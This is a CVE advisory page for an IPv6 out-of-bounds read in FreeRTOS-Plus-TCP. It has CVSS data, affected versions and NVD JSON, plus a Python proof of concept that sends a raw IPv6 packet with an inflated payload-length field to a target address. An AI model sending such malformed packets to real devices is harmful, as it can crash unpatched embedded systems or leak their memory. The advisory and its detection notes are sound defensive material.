Security Vulnerability Report
CVE-2025-11617 CVSS 5.4 MEDIUM

CVE-2025-11617

Published: 2025-10-10 18:15:38
Last Modified: 2025-10-31 18:22:57
Source: ff89ba41-3aa1-4d27-914a-91399e9639e5

Description

A missing validation check in FreeRTOS-Plus-TCP's IPv6 packet processing code can lead to an out-of-bounds read when receiving an IPv6 packet with incorrect payload lengths in the packet header. This issue only affects applications using IPv6. We recommend users upgrade to the latest version and ensure any forked or derivative code is patched to incorporate the new fixes.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:amazon:freertos-plus-tcp:*:*:*:*:*:*:*:* - VULNERABLE
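FreeRTOS-Plus-TCP from V4.0.0 up to, but not including, V4.3.4 (the CPE match range given in the raw JSON below: versionStartIncluding 4.0.0, versionEndExcluding 4.3.4)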

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
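# CVE-2025-11617 PoC - FreeRTOS-Plus-TCP IPv6 OOB Read
# This PoC demonstrates crafting a malicious IPv6 packet with incorrect payload length
# to trigger out-of-bounds read in FreeRTOS-Plus-TCP IPv6 processing code.
#
# Review notes:
# - The page shows no run output and no test against an affected build, so this
#   listing is an unverified illustration of the malformed input, not a
#   confirmed reproducer.
# - What a receiver has to check: the Payload Length field in the fixed IPv6
#   header is sender-controlled. Before reading the payload, it must be compared
#   with the number of bytes actually received after the 40-byte fixed header.
#   The advisory describes that validation as missing; the page lists V4.3.4 as
#   the fixed release.
# - What a monitor can check: a Payload Length larger than the bytes that follow
#   the fixed header in the captured frame marks the packet as malformed.
import socket
import struct


def craft_malicious_ipv6_packet(target_ip="fe80::1"):
    """
    Craft an IPv6 packet with an oversized payload length field
    to trigger OOB read in vulnerable FreeRTOS-Plus-TCP versions.

    The header claims a 65535-byte payload while only 8 bytes follow it, and
    the packet is written to a raw IPv6 socket.

    Args:
        target_ip: Destination IPv6 address in text form. It is parsed with
            ``socket.inet_pton`` outside the ``try`` block, so an invalid
            address raises from that call.

    Returns:
        None. Progress and socket errors are printed; socket errors are not
        re-raised.
    """
    # IPv6 Header format:
    # Version (4 bits) | Traffic Class (8 bits) | Flow Label (20 bits)
    # Payload Length (16 bits) | Next Header (8 bits) | Hop Limit (8 bits)
    # Source Address (128 bits)
    # Destination Address (128 bits)
    version_tc_fl = 0x60000000  # Version 6, TC=0, Flow Label=0
    actual_payload_len = 8  # Actual payload is only 8 bytes
    malicious_payload_len = 65535  # Claimed payload length is maximum (OOB trigger)
    next_header = 59  # No next header (ICMPv6=58, TCP=6, UDP=17)
    hop_limit = 64

    src_addr = socket.inet_pton(socket.AF_INET6, "fe80::2")
    dst_addr = socket.inet_pton(socket.AF_INET6, target_ip)

    # The original listing packed the header twice. The first attempt OR-ed the
    # payload length into the version word and was overwritten before use; that
    # dead store is dropped, and the bytes written to the socket are unchanged.
    ipv6_header = struct.pack(
        "!IHBB16s16s",
        version_tc_fl,
        malicious_payload_len,
        next_header,
        hop_limit,
        src_addr,
        dst_addr,
    )

    # Actual small payload (only 8 bytes): this mismatch with the claimed
    # length is the condition a receiver must reject.
    payload = b"\x41" * actual_payload_len

    # Create raw socket and send. The context manager closes the descriptor on
    # every path; the original never closed it.
    try:
        with socket.socket(
            socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW
        ) as sock:
            sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_HDRINCL, 1)
            sock.sendto(ipv6_header + payload, (target_ip, 0))
            print(f"[*] Malicious IPv6 packet sent to {target_ip}")
            print(f"[*] Claimed payload length: {malicious_payload_len}")
            print(f"[*] Actual payload length: {actual_payload_len}")
    except PermissionError:
        print("[!] Need root/admin privileges to send raw IPv6 packets")
    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    craft_malicious_ipv6_packet()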

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11617", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-10-10T18:15:38.280", "lastModified": "2025-10-31T18:22:57.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A missing validation check in FreeRTOS-Plus-TCP's IPv6 packet processing code can lead to an out-of-bounds read when receiving a IPv6 packet with incorrect payload lengths in the packet header. This issue only affects applications using IPv6.\n\nWe recommend users upgrade to the latest version and ensure any forked or derivative code is patched to incorporate the new fixes."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amazon:freertos-plus-tcp:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.3.4", "matchCriteriaId": "89B35827-054F-4712-A2AB-FB26C87C9C56"}]}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-023/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/FreeRTOS/FreeRTOS-Plus-TCP/releases/tag/V4.3.4", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Release Notes"]}, {"url": "https://github.com/FreeRTOS/FreeRTOS-Plus-TCP/security/advisories/GHSA-wmjr-wm93-cvv2", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}]}}